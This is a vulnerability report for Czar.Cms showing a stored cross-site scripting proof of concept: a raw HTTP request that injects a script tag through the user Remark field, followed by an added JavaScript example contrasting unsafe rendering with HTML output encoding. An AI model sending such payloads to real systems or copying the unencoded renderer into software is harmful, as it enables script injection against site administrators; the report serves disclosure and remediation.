Czar.Cms
Add users in the background - there is XSS in the remarks
PoC:

```
POST /Manager/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 141
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVkHkyELbXkZ591U7-GfIexTnaoBJzXqAaXjoA5H3C6gvRNVVZEsvzH4kjo2ex7nqwNN0zp9AjetYdYquuFK7OiIvPLuLCjm4sSuQ-tFZQWY7sawRxuxp0hXS1vl2F2fEbDNZqWAkZswhhRnETzIfgvA0L2c1wlwu8Hd9iZzyK69g
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Manager/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuW5c6KKu3Hv3_AeZn_Eqz8FiekY-PyIkH57GfSaUX3CuNVAmpSx5KYdBHFWTuuZ-4BQgxoxIX-oBg8oGsWBgJqNKg-5d6xyMsDYpqosZkkNHB18dkAC6C5lh94kPv7Wq3aWf-jFp_ZA5K71nfIvbrHehMSum9bKmVeg44omCGGAfG0YgEYBwT4gQIM-DpQ8ihzLTAJ_CQVOQdWa3FUhulnMO80mKlyNt315-by3Bu-JaP9xkCYxJuuIpqUP8BQbZ19jfrISdQWgPMpbdvHRhmEbzjX8Ch5Y8dVgNgZiyL2S6mNtmuszsosdCdJ39sThpNbVwOvZ-giceXwRRzHBSvj9JlLkxIRQliWExonSpQRZTGt0aSyGXuLEIplNn7cEvwuxOLb_MWsD5qSqhRm30XW5QYXB_kikRurj2XX18q4PN7ISmAyxutiFGyQVY9HbBEqQG92SPxPXP5-8ug6DAc7994R-XPDTkQTU9FTBG9O_6ddLFFqDVZpf6CS3byZDAkRL9N5-k7soot2QEDCiqGqz
Connection: close

Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E
```
Then, in the background, the XSS is exploited successfully.
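
The fix for this class of bug is to encode stored fields when they are written into HTML. The following is an added example, not part of the original report and not Czar.Cms code: it decodes the form body from the request above and renders a user row with and without output encoding. The renderer functions and the table markup are hypothetical, since the report does not show how the admin page builds its list.

```javascript
// Form body from the request in the report (the Remark value is the reporter's test string).
const body = "Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321" +
  "&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E";

// Decode the urlencoded body into a plain object, as a server would before storing it.
function parseForm(raw) {
  return Object.fromEntries(new URLSearchParams(raw));
}

// Encode the five characters that are significant in HTML text and attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical "before" renderer: stored values are concatenated straight into markup,
// so a Remark containing tags becomes part of the page structure.
function renderRowUnsafe(user) {
  return `<tr><td>${user.UserName}</td><td>${user.Remark}</td></tr>`;
}

// Hardened renderer: every stored field is encoded at output time, so the same
// Remark is displayed as text instead of being parsed as an element.
function renderRowSafe(user) {
  return `<tr><td>${escapeHtml(user.UserName)}</td><td>${escapeHtml(user.Remark)}</td></tr>`;
}

// Audit helper: list the fields whose stored value changes under encoding,
// i.e. the ones that carry HTML-significant characters.
function fieldsWithMarkup(user) {
  return Object.keys(user).filter((key) => escapeHtml(user[key]) !== user[key]);
}

const user = parseForm(body);
console.log("fields carrying markup:", fieldsWithMarkup(user));
console.log("unsafe:", renderRowUnsafe(user));
console.log("safe:  ", renderRowSafe(user));
```

Encoding at output covers records that were stored before any input validation was added; the audit helper can be run over existing rows to find them.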